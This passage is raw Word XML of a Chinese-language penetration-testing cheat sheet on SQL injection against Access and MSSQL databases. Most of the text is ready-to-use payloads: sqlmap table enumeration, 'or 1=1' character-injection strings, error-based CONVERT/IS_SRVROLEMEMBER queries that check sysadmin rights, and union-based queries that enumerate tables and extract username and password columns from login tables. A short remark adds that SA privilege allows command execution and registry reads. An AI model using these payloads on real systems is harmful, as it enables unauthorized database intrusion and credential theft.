    </w:p>
    <w:p w14:paraId="53EA4FC9" w14:textId="128B5FB8" w:rsidR="00C51675" w:rsidRPr="00C51675" w:rsidRDefault="00C51675" w:rsidP="00C51675">
      <w:r>
        <w:t>system_user,@@version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>db_name()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B93AAA" w14:textId="77777777" w:rsidR="009B36FD" w:rsidRDefault="009B36FD" w:rsidP="009B36FD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:color w:val="7C79E5"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>爆出access数据库存在的表</w:t>
      </w:r>
      <w:r>
        <w:t>，只能利用枚举的方式爆破。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020C81C6" w14:textId="77777777" w:rsidR="009B36FD" w:rsidRDefault="009B36FD" w:rsidP="009B36FD">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
        </w:rPr>
        <w:t>"xxx"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve">  --tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DB3FA1" w14:textId="77777777" w:rsidR="009B36FD" w:rsidRPr="009B36FD" w:rsidRDefault="009B36FD" w:rsidP="009B36FD"/>
    <w:p w14:paraId="5A24CDE5" w14:textId="77777777" w:rsidR="003C3D8B" w:rsidRDefault="00622ABA" w:rsidP="00CA2DA4">
      <w:pPr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字符型注入：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FBA2D5" w14:textId="77777777" w:rsidR="00622ABA" w:rsidRDefault="00622ABA" w:rsidP="00CA2DA4">
      <w:r>
        <w:t>在数据库中一般语句类似于：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>select *或字段 from menber where id like ‘%字符或字段%’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A29AA5" w14:textId="77777777" w:rsidR="00622ABA" w:rsidRDefault="00622ABA" w:rsidP="00CA2DA4"/>
    <w:p w14:paraId="5913A0E7" w14:textId="77777777" w:rsidR="00622ABA" w:rsidRDefault="00622ABA" w:rsidP="00CA2DA4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入语句%‘</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or 1=1 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6110AC83" w14:textId="77777777" w:rsidR="00622ABA" w:rsidRDefault="00622ABA" w:rsidP="00CA2DA4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%‘</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or 1=1</w:t>
      </w:r>
      <w:r w:rsidR="00850C93">
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B6FB53" w14:textId="77777777" w:rsidR="00850C93" w:rsidRDefault="00850C93" w:rsidP="00CA2DA4"/>
    <w:p w14:paraId="6BB02513" w14:textId="683E0F5D" w:rsidR="00D37ED5" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ms</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 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=sql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE046D1" w14:textId="6C2108E0" w:rsidR="00D86AD6" w:rsidRDefault="00BB3AB0" w:rsidP="00D86AD6">
      <w:hyperlink r:id="rId110" w:history="1">
        <w:r w:rsidR="00D86AD6">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://wenku.baidu.com/view/4e9554740740be1e640e9a0f.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="39994F7C" w14:textId="0C285E6C" w:rsidR="00F84CBD" w:rsidRDefault="00BB3AB0" w:rsidP="006B6474">
      <w:hyperlink r:id="rId111" w:history="1">
        <w:r w:rsidR="00F84CBD" w:rsidRPr="00067C95">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>http://dwz.date/abNg</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7AA7BD37" w14:textId="1033C316" w:rsidR="00F84CBD" w:rsidRPr="00F84CBD" w:rsidRDefault="00BB3AB0" w:rsidP="006B6474">
      <w:hyperlink r:id="rId112" w:history="1">
        <w:r w:rsidR="00F84CBD" w:rsidRPr="00067C95">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>http://dwz.date/abNh</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="79C388F2" w14:textId="53BE5793" w:rsidR="00DF58C3" w:rsidRDefault="00DF58C3" w:rsidP="00DF58C3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持/**/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注释</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4832792B" w14:textId="77777777" w:rsidR="00DF58C3" w:rsidRDefault="00DF58C3" w:rsidP="00DF58C3"/>
    <w:p w14:paraId="3E3718EB" w14:textId="77777777" w:rsidR="00E04FEA" w:rsidRDefault="00E04FEA" w:rsidP="00E04FEA">
      <w:r>
        <w:t>MSSQL中常用参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C3BDBF" w14:textId="77777777" w:rsidR="00E04FEA" w:rsidRDefault="00E04FEA" w:rsidP="00E04FEA"/>
    <w:p w14:paraId="0A532D8B" w14:textId="77777777" w:rsidR="00E04FEA" w:rsidRDefault="00E04FEA" w:rsidP="00E04FEA">
      <w:r>
        <w:t>@@version，查询当前数据库版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3406E937" w14:textId="77777777" w:rsidR="00E04FEA" w:rsidRDefault="00E04FEA" w:rsidP="00E04FEA"/>
    <w:p w14:paraId="082DB3E8" w14:textId="77777777" w:rsidR="00E04FEA" w:rsidRDefault="00E04FEA" w:rsidP="00E04FEA">
      <w:r>
        <w:t>db_name()，查询当前数据库名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5B8559" w14:textId="77777777" w:rsidR="00E04FEA" w:rsidRDefault="00E04FEA" w:rsidP="00E04FEA"/>
    <w:p w14:paraId="3E179EC5" w14:textId="77777777" w:rsidR="00E04FEA" w:rsidRDefault="00E04FEA" w:rsidP="00E04FEA">
      <w:r>
        <w:t>user，查询当前用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B32B393" w14:textId="77777777" w:rsidR="00E04FEA" w:rsidRDefault="00E04FEA" w:rsidP="00E04FEA"/>
    <w:p w14:paraId="531FD73B" w14:textId="77777777" w:rsidR="00E04FEA" w:rsidRDefault="00E04FEA" w:rsidP="00E04FEA">
      <w:r>
        <w:t>IS_SRVROLEMEMBER()，查询数据库权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0790E18E" w14:textId="77777777" w:rsidR="00E04FEA" w:rsidRDefault="00E04FEA" w:rsidP="00E04FEA"/>
    <w:p w14:paraId="5C29C65F" w14:textId="05C69A6C" w:rsidR="00E04FEA" w:rsidRDefault="00E04FEA" w:rsidP="00E04FEA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常用权限：</w:t>
      </w:r>
      <w:r>
        <w:t>sysadmin、serveradmin、setupadmin、securityadmin、diskadmin、bulkadmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1EC2BB" w14:textId="77777777" w:rsidR="00DF58C3" w:rsidRDefault="00DF58C3" w:rsidP="00E04FEA"/>
    <w:p w14:paraId="2442AA5F" w14:textId="4C46901A" w:rsidR="001107F6" w:rsidRDefault="001107F6" w:rsidP="001107F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001107F6">
        <w:t>and exists (select * from sysobjects) //判断是否是</w:t>
      </w:r>
      <w:r w:rsidRPr="001107F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MSSQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1308B1" w14:textId="21F49271" w:rsidR="00DF58C3" w:rsidRDefault="00DF58C3" w:rsidP="001107F6">
      <w:r>
        <w:t>and exists (select count(*) from sysobjects)--有时上面那个语句不行就试试这个哈</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA2C75A" w14:textId="77777777" w:rsidR="00DF58C3" w:rsidRPr="001107F6" w:rsidRDefault="00DF58C3" w:rsidP="001107F6"/>
    <w:p w14:paraId="2C8ED368" w14:textId="28322F01" w:rsidR="001107F6" w:rsidRDefault="001107F6" w:rsidP="001107F6">
      <w:r w:rsidRPr="001107F6">
        <w:t>and exists(select * from tableName) //判断某表是否存在..tableName为表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2841F8FB" w14:textId="6EBED142" w:rsidR="00F90FB1" w:rsidRDefault="00F90FB1" w:rsidP="00F90FB1">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报错注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296ED287" w14:textId="065044BC" w:rsidR="000C7A30" w:rsidRPr="000C7A30" w:rsidRDefault="00BB3AB0" w:rsidP="000C7A30">
      <w:hyperlink r:id="rId113" w:history="1">
        <w:r w:rsidR="000C7A30">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.anquanke.com/post/id/156911</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7E510EE6" w14:textId="77777777" w:rsidR="001107F6" w:rsidRPr="001107F6" w:rsidRDefault="001107F6" w:rsidP="001107F6">
      <w:r w:rsidRPr="001107F6">
        <w:t>and 1=(select @@VERSION) //</w:t>
      </w:r>
      <w:r w:rsidRPr="001107F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MSSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="001107F6">
        <w:t>版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B590C2" w14:textId="77777777" w:rsidR="001107F6" w:rsidRPr="001107F6" w:rsidRDefault="001107F6" w:rsidP="001107F6">
      <w:r w:rsidRPr="001107F6">
        <w:t>And 1=(select db_name()) //当前数据库名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7F180C" w14:textId="77777777" w:rsidR="001107F6" w:rsidRPr="001107F6" w:rsidRDefault="001107F6" w:rsidP="001107F6">
      <w:r w:rsidRPr="001107F6">
        <w:lastRenderedPageBreak/>
        <w:t>and 1=(select @@servername) //本地服务名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCA7FB0" w14:textId="19A0CC23" w:rsidR="001107F6" w:rsidRDefault="001107F6" w:rsidP="001107F6">
      <w:r w:rsidRPr="001107F6">
        <w:t>and 1=(select IS_SRVROLEMEMBER('sysadmin')) //判断是否是系统管理员</w:t>
      </w:r>
      <w:r w:rsidR="00225A5F">
        <w:t>sa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE934E2" w14:textId="77777777" w:rsidR="00631F7E" w:rsidRPr="00631F7E" w:rsidRDefault="00631F7E" w:rsidP="00631F7E">
      <w:r w:rsidRPr="00631F7E">
        <w:t>常用权限：sysadmin、serveradmin、setupadmin、securityadmin、diskadmin、bulkadmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D23B2A7" w14:textId="4A4DDEE7" w:rsidR="00631F7E" w:rsidRDefault="00631F7E" w:rsidP="001107F6"/>
    <w:p w14:paraId="286D268F" w14:textId="04F5A0F6" w:rsidR="00F2049E" w:rsidRDefault="00F2049E" w:rsidP="001107F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="A9B7C6"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="CC7832"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="A9B7C6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="6897BB"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="A9B7C6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>=CONVERT(int,(select suser_sname()))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong" w:eastAsia="FangSong" w:hAnsi="FangSong" w:hint="eastAsia"/>
          <w:color w:val="D7ECFF"/>
          <w:shd w:val="clear" w:color="auto" w:fill="0F1516"/>
        </w:rPr>
        <w:t>关于sa权限下的注入利用方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC99FAB" w14:textId="77777777" w:rsidR="00F2049E" w:rsidRPr="001107F6" w:rsidRDefault="00F2049E" w:rsidP="001107F6"/>
    <w:p w14:paraId="2F91828B" w14:textId="3ADA1C8F" w:rsidR="001107F6" w:rsidRPr="001107F6" w:rsidRDefault="001107F6" w:rsidP="001107F6">
      <w:r w:rsidRPr="001107F6">
        <w:t>and 1=(Select IS_MEMBER('db_owner')) //判断是否是库权限</w:t>
      </w:r>
      <w:r w:rsidR="00225A5F">
        <w:t>dbo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C49CEDB" w14:textId="77777777" w:rsidR="001107F6" w:rsidRPr="001107F6" w:rsidRDefault="001107F6" w:rsidP="001107F6">
      <w:r w:rsidRPr="001107F6">
        <w:t>and 1= (Select HAS_DBACCESS('master')) //判断是否有库读取权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0657D1A4" w14:textId="66D7810A" w:rsidR="001107F6" w:rsidRDefault="00704CE5" w:rsidP="00E04FEA">
      <w:r>
        <w:t>and 1=convert(int,(select top 1 table_name from information_schema.tables ))—</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取第一个表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC001CA" w14:textId="5CF496D5" w:rsidR="00704CE5" w:rsidRDefault="00704CE5" w:rsidP="00E04FEA">
      <w:r>
        <w:t>and 1=convert(int,(select</w:t>
      </w:r>
      <w:r w:rsidR="00581AC9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r w:rsidR="00581AC9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00581AC9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>table_name</w:t>
      </w:r>
      <w:r w:rsidR="00581AC9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidR="00581AC9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>information_schema.tables</w:t>
      </w:r>
      <w:r w:rsidR="00581AC9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">where table_name not in('photoGalary') )) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取第二个表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A65ABB" w14:textId="26F4DD8B" w:rsidR="00704CE5" w:rsidRDefault="00704CE5" w:rsidP="00E04FEA">
      <w:r>
        <w:t xml:space="preserve">and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='login' ))— </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取第一个列名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EE5E08" w14:textId="41866C99" w:rsidR="00704CE5" w:rsidRDefault="00704CE5" w:rsidP="00E04FEA">
      <w:r>
        <w:t>and 1=convert(int,(select top 1 username from login ))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D01061E" w14:textId="5B481A7F" w:rsidR="00704CE5" w:rsidRPr="00704CE5" w:rsidRDefault="00704CE5" w:rsidP="00E04FEA">
      <w:r>
        <w:t>and 1=convert(int,(select top 1 password from login ))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C3498F" w14:textId="27F85192" w:rsidR="00DF58C3" w:rsidRDefault="00DF58C3" w:rsidP="00E04FEA">
      <w:r>
        <w:rPr>
          <w:color w:val="FF00FF"/>
        </w:rPr>
        <w:t>获取当前数据库中的表（有2个语句可供选择使用）【下列语句可一次爆数据库所有表（只限于mssql2005及以上版本）】</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>    and 1=(select quotename(name) from 数据库名..sysobjects where xtype='U' FOR XML PATH(''))-- </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>    and 1=(select '|'%2bname%2b'|' from 数据库名..sysobjects where xtype='U' FOR XML PATH(''))—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377A6666" w14:textId="3B92AFC4" w:rsidR="00DF58C3" w:rsidRDefault="00E534A0" w:rsidP="00E534A0">
      <w:r>
        <w:t xml:space="preserve">AND </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="6897BB"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>=CONVERT(INT,(CHAR(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="6897BB"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>58</w:t>
      </w:r>
      <w:r>
        <w:t>)%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="6897BB"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>bCHAR(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="6897BB"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>58</w:t>
      </w:r>
      <w:r>
        <w:t>)%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="6897BB"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">b(SELECT top </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="6897BB"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CAST(COUNT([name]) AS nvarchar(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="6897BB"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4000</w:t>
      </w:r>
      <w:r>
        <w:t>)) FROM [master]..[sysdatabases] )%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="6897BB"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>bCHAR(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="6897BB"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>58</w:t>
      </w:r>
      <w:r>
        <w:t>)%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="6897BB"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>bCHAR(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="6897BB"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>58</w:t>
      </w:r>
      <w:r>
        <w:t>)))--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AE3A1A" w14:textId="79559200" w:rsidR="00DF58C3" w:rsidRPr="00DF58C3" w:rsidRDefault="00DF58C3" w:rsidP="00E04FEA">
      <w:r>
        <w:rPr>
          <w:color w:val="FF00FF"/>
        </w:rPr>
        <w:t>获得表里的列</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>一次爆指定表的所有列（只限于mssql2005及以上版本）：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>    and 1=(select quotename(name) from 数据库名..syscolumns where id =(select id from 数据库名..sysobjects where name='指定表名') FOR XML PATH(''))-- </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>    and 1=(select '|'%2bname%2b'|' from 数据库名..syscolumns where id =(select id from 数据库名..sysobjects where name='指定表名') FOR XML PATH(''))--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5468BF" w14:textId="77777777" w:rsidR="00D37ED5" w:rsidRPr="00D37ED5" w:rsidRDefault="00D37ED5" w:rsidP="00D37ED5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ED5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SA权限：数据库操作、文件管理、命令执行、注册表读取</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534330AA" w14:textId="77777777" w:rsidR="00D37ED5" w:rsidRPr="00D37ED5" w:rsidRDefault="00D37ED5" w:rsidP="00D37ED5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ED5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DB权限：数据库操作、文件管理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C594E8E" w14:textId="27FCEC8F" w:rsidR="00D37ED5" w:rsidRPr="00E04FEA" w:rsidRDefault="00D37ED5" w:rsidP="00A1412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ED5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Public权限：数据库操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70888A8E" w14:textId="77777777" w:rsidR="00A14128" w:rsidRPr="006F7A6B" w:rsidRDefault="00A14128" w:rsidP="00A141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7A6B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Order by 4  判断字段数  --------字段数为4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41384B4B" w14:textId="77777777" w:rsidR="00A14128" w:rsidRPr="006F7A6B" w:rsidRDefault="00A14128" w:rsidP="00A141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7A6B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（注意：此处我测试两次，第一次可以正常显示，第二次未正常测出字段数此时可以用如下语法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?id=-2 union all select null    错误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?id=-2 union all select null,null    错误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?id=-2 union all select null,null,null    错误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?id=-2 union all select null,null,null,null    正常--------字段数为四）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lastRenderedPageBreak/>
        <w:br/>
        <w:t>?id=-2 union all select '1','2','3','4'      查看显示位--------显示位为2和3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?id=-2 union all select '1',(select top 1 schema_name from information_schema.schemata),'3','4' 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爆出</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7A6B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>数据库名称  dbo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?id=-2 union all select '1',(select top 1 table_name from information_schema.tables where table_schema='dbo'),'3','4'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爆出</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7A6B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>表名    namage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?id=-2 union all select '1',(select col_name(object_id('namage'),1)from sysobjects),'3','4'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字段     三个：id  username  password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AD50B1" w14:textId="77777777" w:rsidR="00A14128" w:rsidRPr="006F7A6B" w:rsidRDefault="00A14128" w:rsidP="00A14128"/>
    <w:p w14:paraId="3EFD64FA" w14:textId="3BC428C6" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t>id=2 and 1=2 union all select 1,(select top</w:t>
      </w:r>
      <w:r w:rsidR="00D80243">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>1 col_name(object_id('manage'),</w:t>
      </w:r>
      <w:r w:rsidRPr="00E605F2">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>) from sysobjects), '3',4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A179A06" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆出三个表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167C8B6F" w14:textId="77777777" w:rsidR="00A14128" w:rsidRPr="00E605F2" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E605F2">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Id    username    password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FDDE17" w14:textId="62C9FE8D" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:r>
        <w:t>?id=-2 union all select '1',username,password,'4' from manage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A375A9C" w14:textId="77777777" w:rsidR="00D53C32" w:rsidRDefault="00D53C32" w:rsidP="00A14128"/>
